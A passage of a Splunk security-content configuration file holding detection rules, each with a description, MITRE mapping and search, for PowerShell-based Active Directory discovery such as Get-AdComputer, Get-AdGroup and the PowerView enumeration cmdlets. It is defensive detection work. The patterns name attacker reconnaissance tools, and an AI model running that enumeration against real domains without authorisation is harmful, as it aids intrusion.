following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify suspicious PowerShell execution. Script Block Logging captures the command sent to PowerShell, the full command to be executed. Upon enabling, logs will output to Windows event logs. Dependent upon volume, enable on critical endpoints or all. \ This analytic identifies the usage of `Get-WMIObject Win32_Group`, which is typically used as a way to identify groups on the endpoint. Typically, by itself, is not malicious but may raise suspicion based on time of day, endpoint and username. \ During triage, review parallel processes using an EDR product or 4688 events. It will be important to understand the timeline of events around this activity. Review the entire logged PowerShell script block. action.escu.how_to_implement = To successfully implement this analytic, you will need to enable PowerShell Script Block Logging on some or all endpoints. Additional setup here https://docs.splunk.com/Documentation/UBA/5.0.4.1/GetDataIn/AddPowerShell#Configure_module_logging_for_PowerShell. action.escu.known_false_positives = False positives may be present. Tune as needed. action.escu.creation_date = 2022-03-22 action.escu.modification_date = 2022-03-22 action.escu.confidence = high action.escu.full_search_name = ESCU - Get WMIObject Group Discovery with Script Block Logging - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Microsoft Windows"] action.escu.analytic_story = ["Active Directory Discovery"] cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Get WMIObject Group Discovery with Script Block Logging - Rule action.correlationsearch.annotations = {"analytic_story": ["Active Directory Discovery"], "cis20": ["CIS 10"], "confidence": 50, "impact": 30, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1069", "T1069.001"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `powershell` EventCode=4104 ScriptBlockText = "*Get-WMIObject*" AND ScriptBlockText = "*Win32_Group*" | stats count min(_time) as firstTime max(_time) as lastTime by EventCode ScriptBlockText Computer UserID | rename Computer as dest, UserID as user | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `get_wmiobject_group_discovery_with_script_block_logging_filter` [ESCU - GetAdComputer with PowerShell - Rule] action.escu = 0 action.escu.enabled = 1 description = This analytic looks for the execution of `powershell.exe` with command-line arguments utilized to discover remote systems. The `Get-AdComputer' commandlet returns a list of all domain computers. Red Teams and adversaries alike may use this commandlet to identify remote systems for situational awareness and Active Directory Discovery. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1018"], "nist": ["DE.AE"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = This analytic looks for the execution of `powershell.exe` with command-line arguments utilized to discover remote systems. The `Get-AdComputer' commandlet returns a list of all domain computers. Red Teams and adversaries alike may use this commandlet to identify remote systems for situational awareness and Active Directory Discovery. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = Administrators or power users may use this command for troubleshooting. action.escu.creation_date = 2021-09-07 action.escu.modification_date = 2021-09-07 action.escu.confidence = high action.escu.full_search_name = ESCU - GetAdComputer with PowerShell - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Active Directory Discovery"] cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - GetAdComputer with PowerShell - Rule action.correlationsearch.annotations = {"analytic_story": ["Active Directory Discovery"], "cis20": ["CIS 10"], "confidence": 50, "impact": 30, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1018"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where (Processes.process_name="powershell.exe") (Processes.process=*Get-AdComputer*) by Processes.dest Processes.user Processes.parent_process Processes.process_name Processes.process Processes.process_id Processes.parent_process_id | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `getadcomputer_with_powershell_filter` [ESCU - GetAdComputer with PowerShell Script Block - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify the execution of the `Get-AdGroup` commandlet. The `Get-AdGroup` commandlet is used to return a list of all domain computers. Red Teams and adversaries may leverage this commandlet to enumerate domain computers for situational awareness and Active Directory Discovery. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1018"], "nist": ["DE.AE"]} action.escu.data_models = [] action.escu.eli5 = The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify the execution of the `Get-AdGroup` commandlet. The `Get-AdGroup` commandlet is used to return a list of all domain computers. Red Teams and adversaries may leverage this commandlet to enumerate domain computers for situational awareness and Active Directory Discovery. action.escu.how_to_implement = To successfully implement this analytic, you will need to enable PowerShell Script Block Logging on some or all endpoints. Additional setup here https://docs.splunk.com/Documentation/UBA/5.0.4.1/GetDataIn/AddPowerShell#Configure_module_logging_for_PowerShell. action.escu.known_false_positives = Administrators or power users may use this PowerShell commandlet for troubleshooting. action.escu.creation_date = 2022-05-02 action.escu.modification_date = 2022-05-02 action.escu.confidence = high action.escu.full_search_name = ESCU - GetAdComputer with PowerShell Script Block - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Microsoft Windows"] action.escu.analytic_story = ["Active Directory Discovery", "CISA AA22-320A"] cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - GetAdComputer with PowerShell Script Block - Rule action.correlationsearch.annotations = {"analytic_story": ["Active Directory Discovery", "CISA AA22-320A"], "cis20": ["CIS 10"], "confidence": 50, "impact": 30, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1018"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `powershell` EventCode=4104 (ScriptBlockText = "*Get-AdComputer*") | stats count min(_time) as firstTime max(_time) as lastTime by Opcode Computer UserID EventCode ScriptBlockText | `security_content_ctime(firstTime)` | `getadcomputer_with_powershell_script_block_filter` [ESCU - GetAdGroup with PowerShell - Rule] action.escu = 0 action.escu.enabled = 1 description = This analytic looks for the execution of `powershell.exe` with command-line arguments utilized to query for domain groups. The `Get-AdGroup` commandlnet is used to return a list of all groups available in a Windows Domain. Red Teams and adversaries alike may leverage this commandlet to enumerate domain groups for situational awareness and Active Directory Discovery. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1069", "T1069.002"], "nist": ["DE.AE"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = This analytic looks for the execution of `powershell.exe` with command-line arguments utilized to query for domain groups. The `Get-AdGroup` commandlnet is used to return a list of all groups available in a Windows Domain. Red Teams and adversaries alike may leverage this commandlet to enumerate domain groups for situational awareness and Active Directory Discovery. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = Administrators or power users may use this command for troubleshooting. action.escu.creation_date = 2021-08-25 action.escu.modification_date = 2021-08-25 action.escu.confidence = high action.escu.full_search_name = ESCU - GetAdGroup with PowerShell - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Active Directory Discovery"] cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - GetAdGroup with PowerShell - Rule action.correlationsearch.annotations = {"analytic_story": ["Active Directory Discovery"], "cis20": ["CIS 10"], "confidence": 50, "impact": 30, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1069", "T1069.002"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where (Processes.process_name="powershell.exe") (Processes.process=*Get-AdGroup*) by Processes.dest Processes.user Processes.parent_process Processes.process_name Processes.process Processes.process_id Processes.parent_process_id | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `getadgroup_with_powershell_filter` [ESCU - GetAdGroup with PowerShell Script Block - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify the execution of the `Get-AdGroup` commandlet. The `Get-AdGroup` commandlet is used to return a list of all domain groups. Red Teams and adversaries may leverage this commandlet to enumerate domain groups for situational awareness and Active Directory Discovery. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1069", "T1069.002"], "nist": ["DE.AE"]} action.escu.data_models = [] action.escu.eli5 = The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify the execution of the `Get-AdGroup` commandlet. The `Get-AdGroup` commandlet is used to return a list of all domain groups. Red Teams and adversaries may leverage this commandlet to enumerate domain groups for situational awareness and Active Directory Discovery. action.escu.how_to_implement = To successfully implement this analytic, you will need to enable PowerShell Script Block Logging on some or all endpoints. Additional setup here https://docs.splunk.com/Documentation/UBA/5.0.4.1/GetDataIn/AddPowerShell#Configure_module_logging_for_PowerShell. action.escu.known_false_positives = Administrators or power users may use this PowerShell commandlet for troubleshooting. action.escu.creation_date = 2022-03-22 action.escu.modification_date = 2022-03-22 action.escu.confidence = high action.escu.full_search_name = ESCU - GetAdGroup with PowerShell Script Block - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Microsoft Windows"] action.escu.analytic_story = ["Active Directory Discovery"] cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - GetAdGroup with PowerShell Script Block - Rule action.correlationsearch.annotations = {"analytic_story": ["Active Directory Discovery"], "cis20": ["CIS 10"], "confidence": 50, "impact": 30, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1069", "T1069.002"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `powershell` EventCode=4104 ScriptBlockText = "*Get-ADGroup*" | stats count min(_time) as firstTime max(_time) as lastTime by EventCode ScriptBlockText Computer UserID | rename Computer as dest, UserID as user | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `getadgroup_with_powershell_script_block_filter` [ESCU - GetCurrent User with PowerShell - Rule] action.escu = 0 action.escu.enabled = 1 description = This analytic looks for the execution of `powerhsell.exe` with command-line arguments that execute the `GetCurrent` method of the WindowsIdentity .NET class. This method returns an object that represents the current Windows user. Red Teams and adversaries may leverage this method to identify the logged user on a compromised endpoint for situational awareness and Active Directory Discovery. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1033"], "nist": ["DE.AE"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = This analytic looks for the execution of `powerhsell.exe` with command-line arguments that execute the `GetCurrent` method of the WindowsIdentity .NET class. This method returns an object that represents the current Windows user. Red Teams and adversaries may leverage this method to identify the logged user on a compromised endpoint for situational awareness and Active Directory Discovery. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = Administrators or power users may use this command for troubleshooting. action.escu.creation_date = 2021-09-13 action.escu.modification_date = 2021-09-13 action.escu.confidence = high action.escu.full_search_name = ESCU - GetCurrent User with PowerShell - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Active Directory Discovery"] cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - GetCurrent User with PowerShell - Rule action.correlationsearch.annotations = {"analytic_story": ["Active Directory Discovery"], "cis20": ["CIS 10"], "confidence": 50, "impact": 30, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1033"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where (Processes.process_name="powershell.exe") (Processes.process=*System.Security.Principal.WindowsIdentity* OR Processes.process=*GetCurrent()*) by Processes.dest Processes.user Processes.parent_process Processes.process_name Processes.process Processes.process_id Processes.parent_process_id | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `getcurrent_user_with_powershell_filter` [ESCU - GetCurrent User with PowerShell Script Block - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify the execution of the `GetCurrent` method of the WindowsIdentity .NET class. This method returns an object that represents the current Windows user. Red Teams and adversaries may leverage this method to identify the logged user on a compromised endpoint for situational awareness and Active Directory Discovery. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1033"], "nist": ["DE.AE"]} action.escu.data_models = [] action.escu.eli5 = The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify the execution of the `GetCurrent` method of the WindowsIdentity .NET class. This method returns an object that represents the current Windows user. Red Teams and adversaries may leverage this method to identify the logged user on a compromised endpoint for situational awareness and Active Directory Discovery. action.escu.how_to_implement = To successfully implement this analytic, you will need to enable PowerShell Script Block Logging on some or all endpoints. Additional setup here https://docs.splunk.com/Documentation/UBA/5.0.4.1/GetDataIn/AddPowerShell#Configure_module_logging_for_PowerShell. action.escu.known_false_positives = Administrators or power users may use this PowerShell commandlet for troubleshooting. action.escu.creation_date = 2022-03-22 action.escu.modification_date = 2022-03-22 action.escu.confidence = high action.escu.full_search_name = ESCU - GetCurrent User with PowerShell Script Block - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Microsoft Windows"] action.escu.analytic_story = ["Active Directory Discovery"] cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - GetCurrent User with PowerShell Script Block - Rule action.correlationsearch.annotations = {"analytic_story": ["Active Directory Discovery"], "cis20": ["CIS 10"], "confidence": 50, "impact": 30, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1033"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `powershell` EventCode=4104 ScriptBlockText = "*[System.Security.Principal.WindowsIdentity]*" ScriptBlockText = "*GetCurrent()*" | stats count min(_time) as firstTime max(_time) as lastTime by EventCode ScriptBlockText Computer UserID | rename Computer as dest, UserID as user | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `getcurrent_user_with_powershell_script_block_filter` [ESCU - GetDomainComputer with PowerShell - Rule] action.escu = 0 action.escu.enabled = 1 description = This analytic looks for the execution of `powershell.exe` with command-line arguments utilized to discover remote systems. `Get-DomainComputer` is part of PowerView, a PowerShell tool used to perform enumeration on Windows domains. Red Teams and adversaries alike may leverage PowerView to enumerate domain groups for situational awareness and Active Directory Discovery. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1018"], "nist": ["DE.CM"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = This analytic looks for the execution of `powershell.exe` with command-line arguments utilized to discover remote systems. `Get-DomainComputer` is part of PowerView, a PowerShell tool used to perform enumeration on Windows domains. Red Teams and adversaries alike may leverage PowerView to enumerate domain groups for situational awareness and Active Directory Discovery. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = Administrators or power users may use PowerView for troubleshooting. action.escu.creation_date = 2021-09-07 action.escu.modification_date = 2021-09-07 action.escu.confidence = high action.escu.full_search_name = ESCU - GetDomainComputer with PowerShell - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Active Directory Discovery"] action.risk = 1 action.risk.param._risk_message = Remote system discovery enumeration on $dest$ by $user$ action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 24}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - GetDomainComputer with PowerShell - Rule action.correlationsearch.annotations = {"analytic_story": ["Active Directory Discovery"], "cis20": ["CIS 10"], "confidence": 80, "impact": 30, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1018"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = This analytic looks for the execution of `powershell.exe` with command-line arguments utilized to discover remote systems. `Get-DomainComputer` is part of PowerView, a PowerShell tool used to perform enumeration on Windows domains. Red Teams and adversaries alike may leverage PowerView to enumerate domain groups for situational awareness and Active Directory Discovery. action.notable.param.rule_title = GetDomainComputer with PowerShell action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where (Processes.process_name="powershell.exe") (Processes.process=*Get-DomainComputer*) by Processes.dest Processes.user Processes.parent_process Processes.process_name Processes.process Processes.process_id Processes.parent_process_id | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `getdomaincomputer_with_powershell_filter` [ESCU - GetDomainComputer with PowerShell Script Block - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify the execution of the `Get-DomainComputer` commandlet. `GetDomainComputer` is part of PowerView, a PowerShell tool used to perform enumeration on Windows domains. Red Teams and adversaries alike may use PowerView to enumerate domain computers for situational awareness and Active Directory Discovery. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1018"], "nist": ["DE.CM"]} action.escu.data_models = [] action.escu.eli5 = The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify the execution of the `Get-DomainComputer` commandlet. `GetDomainComputer` is part of PowerView, a PowerShell tool used to perform enumeration on Windows domains. Red Teams and adversaries alike may use PowerView to enumerate domain computers for situational awareness and Active Directory Discovery. action.escu.how_to_implement = To successfully implement this analytic, you will need to enable PowerShell Script Block Logging on some or all endpoints. Additional setup here https://docs.splunk.com/Documentation/UBA/5.0.4.1/GetDataIn/AddPowerShell#Configure_module_logging_for_PowerShell. action.escu.known_false_positives = Administrators or power users may use PowerView for troubleshooting. action.escu.creation_date = 2022-05-02 action.escu.modification_date = 2022-05-02 action.escu.confidence = high action.escu.full_search_name = ESCU - GetDomainComputer with PowerShell Script Block - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Microsoft Windows"] action.escu.analytic_story = ["Active Directory Discovery"] action.risk = 1 action.risk.param._risk_message = Remote system discovery with PowerView on $Computer$ by $user$ action.risk.param._risk = [{"risk_object_field": "Computer", "risk_object_type": "system", "risk_score": 24}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - GetDomainComputer with PowerShell Script Block - Rule action.correlationsearch.annotations = {"analytic_story": ["Active Directory Discovery"], "cis20": ["CIS 10"], "confidence": 80, "impact": 30, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1018"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify the execution of the `Get-DomainComputer` commandlet. `GetDomainComputer` is part of PowerView, a PowerShell tool used to perform enumeration on Windows domains. Red Teams and adversaries alike may use PowerView to enumerate domain computers for situational awareness and Active Directory Discovery. action.notable.param.rule_title = GetDomainComputer with PowerShell Script Block action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `powershell` EventCode=4104 (ScriptBlockText = "*Get-DomainComputer*") | stats count min(_time) as firstTime max(_time) as lastTime by Opcode Computer UserID EventCode ScriptBlockText | `security_content_ctime(firstTime)` | `getdomaincomputer_with_powershell_script_block_filter` [ESCU - GetDomainController with PowerShell - Rule] action.escu = 0 action.escu.enabled = 1 description = This analytic looks for the execution of `powershell.exe` with command-line arguments utilized to discover remote systems. `Get-DomainController` is part of PowerView, a PowerShell tool used to perform enumeration on Windows domains. Red Teams and adversaries alike may leverage PowerView to enumerate domain groups for situational awareness and Active Directory Discovery. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1018"], "nist": ["DE.AE"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = This analytic looks for the execution of `powershell.exe` with command-line arguments utilized to discover remote systems. `Get-DomainController` is part of PowerView, a PowerShell tool used to perform enumeration on Windows domains. Red Teams and adversaries alike may leverage PowerView to enumerate domain groups for situational awareness and Active Directory Discovery. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = Administrators or power users may use PowerView for troubleshooting. action.escu.creation_date = 2021-09-07 action.escu.modification_date = 2021-09-07 action.escu.confidence = high action.escu.full_search_name = ESCU - GetDomainController with PowerShell - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Active Directory Discovery"] cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - GetDomainController with PowerShell - Rule action.correlationsearch.annotations = {"analytic_story": ["Active Directory Discovery"], "cis20": ["CIS 10"], "confidence": 80, "impact": 30, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1018"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where (Processes.process_name="powershell.exe") (Processes.process=*Get-DomainController*) by Processes.dest Processes.user Processes.parent_process Processes.process_name Processes.process Processes.process_id Processes.parent_process_id | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `getdomaincontroller_with_powershell_filter` [ESCU - GetDomainController with PowerShell Script Block - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify the execution of the `Get-DomainController` commandlet. `Get-DomainController` is part of PowerView, a PowerShell tool used to perform enumeration on Windows domains. Red Teams and adversaries alike may use PowerView to enumerate domain computers for situational awareness and Active Directory Discovery. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1018"], "nist": ["DE.CM"]} action.escu.data_models = [] action.escu.eli5 = The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify the execution of the `Get-DomainController` commandlet. `Get-DomainController` is part of PowerView, a PowerShell tool used to perform enumeration on Windows domains. Red Teams and adversaries alike may use PowerView to enumerate domain computers for situational awareness and Active Directory Discovery. action.escu.how_to_implement = To successfully implement this analytic, you will need to enable PowerShell Script Block Logging on some or all endpoints. Additional setup here https://docs.splunk.com/Documentation/UBA/5.0.4.1/GetDataIn/AddPowerShell#Configure_module_logging_for_PowerShell. action.escu.known_false_positives = Administrators or power users may use this PowerShell commandlet for troubleshooting. action.escu.creation_date = 2022-05-02 action.escu.modification_date = 2022-05-02 action.escu.confidence = high action.escu.full_search_name = ESCU - GetDomainController with PowerShell Script Block - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Microsoft Windows"] action.escu.analytic_story = ["Active Directory Discovery"] action.risk = 1 action.risk.param._risk_message = Remote system discovery with PowerView on $Computer$ by $UserID$ action.risk.param._risk = [{"risk_object_field": "Computer", "risk_object_type": "system", "risk_score": 24}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - GetDomainController with PowerShell Script Block - Rule action.correlationsearch.annotations = {"analytic_story": ["Active Directory Discovery"], "cis20": ["CIS 10"], "confidence": 80, "impact": 30, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1018"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify the execution of the `Get-DomainController` commandlet. `Get-DomainController` is part of PowerView, a PowerShell tool used to perform enumeration on Windows domains. Red Teams and adversaries alike may use PowerView to enumerate domain computers for situational awareness and Active Directory Discovery. action.notable.param.rule_title = GetDomainController with PowerShell Script Block action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `powershell` EventCode=4104 (ScriptBlockText = "*Get-DomainController*") | stats count min(_time) as firstTime max(_time) as lastTime by Opcode Computer UserID EventCode ScriptBlockText | `security_content_ctime(firstTime)` | `getdomaincontroller_with_powershell_script_block_filter` [ESCU - GetDomainGroup with PowerShell - Rule] action.escu = 0 action.escu.enabled = 1 description = This analytic looks for the execution of `powershell.exe` with command-line arguments utilized to query for domain groups. `Get-DomainGroup` is part of PowerView, a PowerShell tool used to perform enumeration on Windows domains. Red Teams and adversaries alike may leverage PowerView to enumerate domain groups for situational awareness and Active Directory Discovery. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": 